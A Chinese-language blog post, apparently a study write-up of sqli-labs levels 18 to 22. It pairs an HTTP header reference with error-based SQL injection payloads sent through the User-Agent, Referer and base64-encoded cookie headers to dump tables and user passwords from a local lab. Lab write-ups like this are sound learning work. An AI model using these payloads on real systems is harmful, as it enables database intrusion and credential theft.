less18-22,測試上傳markdown
在利用抓包工具進行抓包的時候,我們能看到很多的項,下面詳細講解每一項。
HTTP 頭部詳解
1、 Accept:告訴 WEB 伺服器自己接受什麼介質型別,/ 表示任何型別,type/* 表示該型別下的所有子型別,type/sub-type。
2、 Accept-Charset: 瀏覽器申明自己接收的字符集Mysql 注入---sqlilabs---lcamryAccept-Encoding: 瀏覽器申明自己接收的編碼方法,通常指定壓縮方法,是否支援壓縮,支援什麼壓縮方法(gzip,deflate)Accept-Language::瀏覽器申明自己接收的語言語言跟字符集的區別:中文是語言,中文有多種字符集,比如 big5,gb2312,gbk 等等。
3、 Accept-Ranges:WEB 伺服器表明自己是否接受獲取其某個實體的一部分(比如檔案的一部分)的請求。bytes:表示接受,none:表示不接受。
4、 Age:當代理伺服器用自己快取的實體去響應請求時,用該頭部表明該實體從產生到現在經過多長時間了。
5、 Authorization:當客戶端接收到來自 WEB 伺服器的 WWW-Authenticate 響應時,用該頭部來回應自己的身份驗證資訊給 WEB 伺服器。
6、 Cache-Control:請求:no-cache(不要快取的實體,要求現在從 WEB 伺服器去取)
max-age:(只接受 Age 值小於 max-age 值,並且沒有過期的物件)
max-stale:(可以接受過去的物件,但是過期時間必須小於 max-stale 值)
min-fresh:(接受其新鮮生命期大於其當前 Age 跟 min-fresh 值之和的快取物件)響應:public(可以用 Cached 內容迴應任何使用者)private(只能用快取內容迴應先前請求該內容的那個使用者)no-cache(可以快取,但是隻有在跟 WEB 伺服器驗證了其有效後,才能返回給客戶端)max-age:(本響應包含的物件的過期時間)ALL: no-store(不允許快取)
7、 Connection:請求:close(告訴 WEB 伺服器或者代理伺服器,在完成本次請求的響應後,斷開連線,不要等待本次連線的後續請求了)。keepalive(告訴 WEB 伺服器或者代理伺服器,在完成本次請求的響應後,保持連線,等待本次連線的後續請求)。響應:close(連線已經關閉)。keepalive(連線保持著,在等待本次連線的後續請求)。Keep-Alive:如果瀏覽器請求保持連線,則該頭部表明希望 WEB 伺服器保持連線多長時間(秒)。例如:Keep-Alive:300
8、 Content-Encoding:WEB 伺服器表明自己使用了什麼壓縮方法(gzip,deflate)壓縮響應中的物件。例如:Content-Encoding:gzip
9、Content-Language:WEB 伺服器告訴瀏覽器自己響應的物件的語言。
10、Content-Length:WEB 伺服器告訴瀏覽器自己響應的物件的長度。例如:Content-Length:26012
11、Content-Range: WEB 伺服器表明該響應包含的部分物件為整個物件的哪個部分。例如:Content-Range: bytes 21010-47021/47022
12、Content-Type: WEB 伺服器告訴瀏覽器自己響應的物件的型別。例如:Content-Type:application/xml
13、 ETag:就是一個物件(比如 URL)的標誌值,就一個物件而言,比如一個 html 檔案,如果被修改了,其 Etag 也會別修改,所以 ETag 的作用跟 Last-Modified 的作用差不多,主要供 WEB 伺服器判斷一個物件是否改變了。比如前一次請求某個 html 檔案時,獲得了其ETag,當這次又請求這個檔案時,瀏覽器就會把先前獲得的 ETag 值傳送給 WEB 伺服器,然後 WEB 伺服器會把這個 ETag 跟該檔案的當前 ETag 進行對比,然後就知道這個檔案有沒有改變了。
14、 Expired:WEB 伺服器表明該實體將在什麼時候過期,對於過期了的物件,只有在跟WEB 伺服器驗證了其有效性後,才能用來響應客戶請求。是 HTTP/1.0 的頭部。例如:Expires:Mysql 注入---sqlilabs---lcamrySat, 23 May 2009 10:02:12 GMT
15、 Host:客戶端指定自己想訪問的 WEB 伺服器的域名/IP 地址和埠號。例如:Host:rss.sina.com.cn
16、 If-Match:如果物件的 ETag 沒有改變,其實也就意味著物件沒有改變,才執行請求的動作。
17、If-None-Match:如果物件的 ETag 改變了,其實也就意味著物件也改變了,才執行請求的動作。
18、 If-Modified-Since:如果請求的物件在該頭部指定的時間之後修改了,才執行請求的動作(比如返回物件),否則返回程式碼 304,告訴瀏覽器 該物件沒有修改。例如:If-Modified-Since:Thu, 10 Apr 2008 09:14:42 GMT
19、If-Unmodified-Since:如果請求的物件在該頭部指定的時間之後沒修改過,才執行請求的動作(比如返回物件)。
20、 If-Range:瀏覽器告訴 WEB 伺服器,如果我請求的物件沒有改變,就把我缺少的部分給我,如果物件改變了,就把整個物件給我。瀏覽器通過傳送請求物件的 ETag 或者 自己所知道的最後修改時間給 WEB 伺服器,讓其判斷物件是否改變了。總是跟 Range 頭部一起使用。
21、 Last-Modified:WEB 伺服器認為物件的最後修改時間,比如檔案的最後修改時間,動態頁面的最後產生時間等等。例如:Last-Modified:Tue, 06 May 2008 02:42:43 GMT
22、 Location:WEB 伺服器告訴瀏覽器,試圖訪問的物件已經被移到別的位置了,到該頭部 指 定 的 位 置 去 取 。 例 如 : Location : http://i0.sinaimg.cn/dy/deco/2008/0528/sinahome_0803_ws_005_text_0.gif
23、 Pramga:主要使用 Pramga: no-cache,相當於 Cache-Control: no-cache。例如:Pragma:no-cache
24、 Proxy-Authenticate: 代理伺服器響應瀏覽器,要求其提供代理身份驗證資訊。Proxy-Authorization:瀏覽器響應代理伺服器的身份驗證請求,提供自己的身份資訊。
25、 Range:瀏覽器(比如 Flashget 多執行緒下載時)告訴 WEB 伺服器自己想取物件的哪部分。例如:Range: bytes=1173546-
26、 Referer:瀏覽器向 WEB 伺服器表明自己是從哪個 網頁/URL 獲得點選 當前請求中的網址/URL。例如:Referer:http://www.sina.com/
27、 Server: WEB 伺服器表明自己是什麼軟體及版本等資訊。例如:Server:Apache/2.0.61(Unix)
28、 User-Agent: 瀏覽器表明自己的身份(是哪種瀏覽器)。例如:User-Agent:Mozilla/5.0(Windows; U; Windows NT 5.1; zh-CN; rv:1.8.1.14) Gecko/20080404 Firefox/2、0、0、14
29、 Transfer-Encoding: WEB 伺服器表明自己對本響應訊息體(不是訊息體裡面的物件)作了怎樣的編碼,比如是否分塊(chunked)。例如:Transfer-Encoding: chunked
30、 Vary: WEB 伺服器用該頭部的內容告訴 Cache 伺服器,在什麼條件下才能用本響應所返回的物件響應後續的請求。假如源 WEB 伺服器在接到第一個請求訊息時,其響應訊息的頭部為:Content- Encoding: gzip; Vary: Content-Encoding 那麼 Cache 伺服器會分析後續請求訊息的頭部,檢查其 Accept-Encoding,是否跟先前響應的 Vary 頭部值一致,即是否使用相同的內容編碼方法,這樣就可以防止 Cache 伺服器用自己 Cache 裡面壓縮後的實體響應給不具備解壓能力的瀏覽器。例如:Vary:Accept-Encoding
31、 Via: 列出從客戶端到 OCS 或者相反方向的響應經過了哪些代理伺服器,他們用什麼協議(和版本)傳送的請求。當客戶端請求到達第一個代理伺服器時,該伺服器會在自己發出的請求裡面添 加 Via 頭部,並填上自己的相關資訊,當下一個代理伺服器收到第一個代Mysql 注入---sqlilabs---lcamry49理伺服器的請求時,會在自己發出的請求裡面複製前一個代理伺服器的請求的 Via 頭部,並把自己的相關資訊加到後面,以此類推,當 OCS 收到最後一個代理伺服器的請求時,檢查Via 頭部,就知道該請求所經過的路由。例如:Via:1.0 236.D0707195.sina.com.cn:80(squid/2.6.STABLE13)
less-18
http://127.0.0.1/sqli-labs-master/Less-18
uname=admin1&passwd=1&submit=Submit
ddd' and extractvalue(1,concat('~',(select schema_name from information_schema.schemata),'~')) and '1'='1
在less-18的原始碼中,有$uagent=$_SERVER['HTTP_USER_AGENT']且$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";於是我們可以在這個地方抓包或者是使用其他方式修改user-agent.
可以只用burp抓包修改,也可以直接在hackbar中修改user-agent
所以直接構造一系列payload就行:
#一個一個查詢#
1'and extractvalue(1,concat('~',(select table_name from information_schema.tables where table_schema=database()),'~')) and '1'='1
#使用group_concat聯和表#
#爆表名#
1'and extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()),'~')) and '1'='1
#爆列名#
1'and extractvalue(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),'~')) and '1'='1
#爆資料#
1'and extractvalue(1,concat('~',(select group_concat(id,':',username,'==>',password,'\n') from users),'~')) and '1'='1
注意:
- 使用者名稱和密碼要填寫正確
- 給user-agent一個值,因為使用的and連線,所以要確保user-agent不為NULL,因為這裡不能--+,所以要注意
- 其實不給user-agent也是可以的,那麼就是用or連線(全是錯誤的就ok,但是最重要的還是封閉
Less-19
這是考的Referer中的注入,將Less-18中程式碼拿下來用就行;
burp中新增Referer:Less-18的程式碼
hackbar:選擇Referer按鈕;
Less-20
首先我們是沒有cookie的,從原始碼中和運行了幾次抓包發現,如果沒有cookie提交cookie,那麼就會自動建立一個uname='Dumb'的cookie,於是在payload中構造了uname=Dumb' and extractvalue(1,concat('~',(select group_concat(username,':',password) from users),'~'))#
而且,可以用這個cookie反覆提交
天書:
從原始碼中看到cookie從username中獲得值之後,當再次重新整理的時候,會從cooike中讀取username,隨後進行查詢
登入成功之後,修改cookie,再次重新整理時,SQL就被修改了
Less-21
這關是對cookie進行了base64加密,將cookie加密了就行;
從圖中看出,我們只需要對uname之後的進行加密即可;
uname=RHVtYicgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgnficsKHNlbGVjdCBncm91cF9jb25jYXQodXNlcm5hbWUsJzonLHBhc3N3b3JkKSBmcm9tIHVzZXJzKSwnficpKSM=
額,居然出問題了。啊這,人給我整傻了。我這就是把上面那句話base64了一下誒;這個就請暫且過了,看less-22.
Less-22
講Dumb'換成Dumb",後面的不變,接著進行base64加密就行。
uname=RHVtYiIgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgnficsKHNlbGVjdCBncm91cF9jb25jYXQodXNlcm5hbWUsJzonLHBhc3N3b3JkKSBmcm9tIHVzZXJzKSwnficpKSM=
參考:《sql注入天書》
注意:如果本文中有什麼不妥的地方,請指正,謝謝~